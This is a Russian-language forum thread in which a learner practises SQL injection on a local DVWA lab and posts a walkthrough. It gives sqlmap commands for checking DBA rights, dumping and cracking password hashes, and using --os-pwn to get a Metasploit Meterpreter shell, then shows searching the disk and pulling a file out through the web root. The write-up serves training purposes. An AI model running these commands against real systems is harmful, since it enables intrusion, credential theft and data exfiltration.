Старый 10.01.2013, 20:23   #1
toorook
RAM 128MB

toorook на пути к лучшему
toorook вне форума

По умолчанию Вопросы по Sql-inj и Sqlmap.

Всем hi! Вот взялся изучать Sql-inj. Для "тренировочной" площадки взял DVWA. Пока все локально. Для поиска и эксплуатации использую SqlMap - мне эта тулза сразу приглянулась, что может и не правильно. Вроде получается - уровень low прошел.:comando::comando:

Но появились вопросы:
1. Могу ли я через sql-inj пробраться к файловой системе сервера. Мне не нужны файлы БД, надо файлы которые хранятся "где-то" на диске.
2. Могу ли я запустить через sql-inj запустить командную оболочку? Зачем? Чтоб создать пользователя и подключиться удаленно, для поиска того самого файла.

Или же все это бред:33: и веб-сервер не пустит меня дальше своей директории? Надо искать другую дырку...

Хз, может важно или вы подскажите что можно сообразить используя эти команды. Может их как-то изменить под задачи выше?

Узнать права юзера БД в системе:
Цитата:
root@root-K52JU:python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --is-dba -v 1
Сдампить и крякнуть пароли с БД:cj::
Цитата:
root@rot-K52JU: python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=nabh6k42t8rmmrpj7kf7118l80; security=low" -D dvwa -T users -C user,password --dump

Последний раз редактировалось toorook; 12.01.2013 в 11:35.
Ответ: Вопросы по Sql-inj и Sqlmap.
Старый 12.01.2013, 12:46   #2
toorook
RAM 128MB

toorook на пути к лучшему
toorook вне форума
По умолчанию Ответ: Вопросы по Sql-inj и Sqlmap.

Итак, может кому пригодиться! По причене молчания форумчан в ответ на мой топик с вопросами, я решил не тратить времени и зделать все самостоятельно. Может кому из новичков будет интерестно - это не так сложно как кажеться. Все будет происходить на примере DVWA.

Задача:
Найти отпреденный файл, который храниться в неизвестном мне месте. Я почти знаю его имя

Разведка:
Ищу ошибки, подстваляя "кривые" значения. Не забываю посматривать на то, что отсылает мне web-сервер. Прислал куки. Бинго! Получил ошибку из id-1' .
Пробую sqlmap. Узнаю БД и юзера, плюс получаю "банер" - инфу о веб сервере.
Цитата:
sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=nabh6k42t8rmmrpj7kf7118l80; security=low" -b --current-db --current-user -v 1

Манипуляции с БД мне не интерестны. Иду дальше. Много часов безрезультатно потратив на поиск wed-shell и возможности его "залить", вспомнил что еще есть Metaspoloit!!!

Читаем мануaл для sqlmap!

Делаю следующие:
Цитата:
python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=cauegstbj88o6cgs8v17na3hv4; security=low" -v 1 --os-pwn
Ключ:
--os-pwn
Загрузка и выполнение полезной нагрузки в Metasploit

Вывод sqlmap:

Далее можно увидеть все по скринам:

Так, metasploit запустил полезную нагрузку meterpreter. Все становиться на много проще!))
Хочу запустить Cmd.exe - даю команду shell. Интерпритатор запустился, но вижу кракозябры, вместо нормального вывода. Ща исправим!

Даю команду
Цитата:
chcp 1251
Затем переключаю кодировочную сраницу у себя в термиле. Так значительней удобнее.
Осталось найти файл! Дело за малым! Даю команду:

Цитата:
DIR /b/s/a-d C:\SM0-*.jpg
Что делаю? Ищу фотку начинающиюся с SM0. Остальную часть имени я не помню. Запускаю и почти мгновенно файл найден!

Вот и все осталось получить его обратно! Наверно можно было бы и по другому но я решил его скопировать в рабочею директорию сайта и просто скачать через браузер!

Потом я конечно удаляю все найденные файлы с удаленного хоста и закрываю сессию meterpreter.

---------------------------------------------------------------------------------------
Ну вот как то так. Возможно есть и другие варианты решения этой задачи, но мне так было удобней. Т.к. я юзаю linux, я не знаю как sqlmap будет взаимодействовать с Metasploit'ом под Wndows. Хотя никто не запрещает использовать BackTrack. Жду ваших комментариев и очень надеюсь что это кому-то поможет (не только в атаке, но и в защите!).

Добавлено через 1 час 19 минут 54 секунды
Ссылочки в догонку поста:
DVWA - [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
Секреты Meterpreter Payload - [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
Sql-inj для начинающих - [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]

p.s.s. Эксплойтом 445 порта, хост не пробивался...

Последний раз редактировалось toorook; 13.01.2013 в 18:49. Причина: Добавлено сообщение
Ответ

Метки
cmd.exe, sql-inj, sqlmap

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск